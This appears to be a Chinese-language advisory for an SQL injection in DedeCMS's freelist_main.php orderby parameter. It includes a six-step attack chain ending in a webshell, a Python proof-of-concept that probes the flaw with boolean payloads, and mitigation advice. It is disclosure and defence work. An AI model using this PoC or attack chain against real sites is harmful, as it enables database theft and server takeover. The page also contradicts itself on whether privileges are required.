CVE-2025-15004 DedeCMS /freelist_main.php orderby参数SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-15004

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

DedeCMS

漏洞概述

CVE-2025-15004是DedeCMS中存在的一个SQL注入漏洞，存在于freelist_main.php文件的orderby参数处理中。攻击者可以通过构造恶意的orderby参数值来执行未经授权的SQL查询，获取数据库中的敏感信息或进行进一步的攻击。该漏洞影响DedeCMS 5.7.118及之前版本，CVSS评分6.3（中危），攻击复杂度低，无需特殊权限即可远程利用。由于该漏洞的利用代码已公开，攻击者可能利用此漏洞对使用DedeCMS的网站造成严重安全威胁。DedeCMS是国内广泛使用的内容管理系统，该漏洞的存在可能导致大量网站面临数据泄露风险。

技术细节

该SQL注入漏洞存在于DedeCMS的freelist_main.php文件中，具体是orderby参数未经过充分的安全过滤就直接拼接到SQL查询语句中。攻击者可以通过在orderby参数中注入恶意SQL语句片段，如使用UNION SELECT、布尔盲注或时间盲注等技术来提取数据库中的敏感信息。由于DedeCMS使用MySQL数据库，攻击者可能获取到管理员账户密码、用户数据、业务敏感信息等。攻击者需要具有低权限账户即可发起攻击，但成功利用后可提升权限或完全控制数据库系统。漏洞的利用不需要用户交互，攻击者可以直接通过HTTP请求远程利用此漏洞。

攻击链分析

STEP 1

步骤1

攻击者扫描目标网站，识别DedeCMS版本（<=5.7.118），确认freelist_main.php存在

STEP 2

步骤2

攻击者访问freelist_main.php页面，观察正常请求和响应特征

STEP 3

步骤3

攻击者构造包含恶意SQL语句的orderby参数，如注入UNION SELECT或布尔盲注payload

STEP 4

步骤4

发送恶意HTTP请求到目标服务器，触发SQL注入漏洞执行未授权SQL代码

STEP 5

步骤5

通过SQL注入提取数据库敏感信息，如管理员账号、密码哈希等

STEP 6

步骤6

利用获取的凭据登录后台管理系统，进一步获取服务器webshell权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-15004 DedeCMS SQL Injection PoC
# Target: DedeCMS <= 5.7.118
# Endpoint: /freelist_main.php
# Parameter: orderby

def exploit(target_url, orderby_payload):
    """Exploit SQL injection in DedeCMS freelist_main.php"""
    target = target_url.rstrip('/') + '/freelist_main.php'
    
    params = {
        'orderby': orderby_payload
    }
    
    try:
        response = requests.get(target, params=params, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None

def blind_sqli(target_url):
    """Boolean-based blind SQL injection test"""
    # True condition - should return results
    true_payload = "1=1"
    # False condition - should not return results  
    false_payload = "1=2"
    
    print("[*] Testing true condition...")
    true_result = exploit(target_url, true_payload)
    
    print("[*] Testing false condition...")
    false_result = exploit(target_url, false_payload)
    
    if true_result != false_result:
        print("[+] SQL Injection vulnerability confirmed!")
        return True
    else:
        print("[-] SQL Injection not detected")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://target.com/dede")
        sys.exit(1)
    
    target = sys.argv[1]
    print(f"[*] Target: {target}")
    print(f"[*] Exploiting CVE-2025-15004...")
    
    blind_sqli(target)

影响范围

DedeCMS < 5.7.119

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）使用Web应用防火墙规则拦截包含SQL注入特征的请求；2）限制freelist_main.php的访问权限，仅允许可信IP访问；3）临时关闭自由列表功能模块；4）启用数据库访问日志监控，及时发现异常SQL查询行为；5）对orderby参数实施严格的的白名单过滤，仅允许预定义的安全字段名。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15004
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15004
3 Details https://www.cvedetails.com/cve/CVE-2025-15004/
4 VulDB https://vuldb.com/cve/CVE-2025-15004
5 Link https://note-hxlab.wetolink.com/share/JPq560c6F6tu
6 Link https://vuldb.com/?ctiid.337710
7 Link https://vuldb.com/?id.337710
8 Link https://vuldb.com/?submit.717316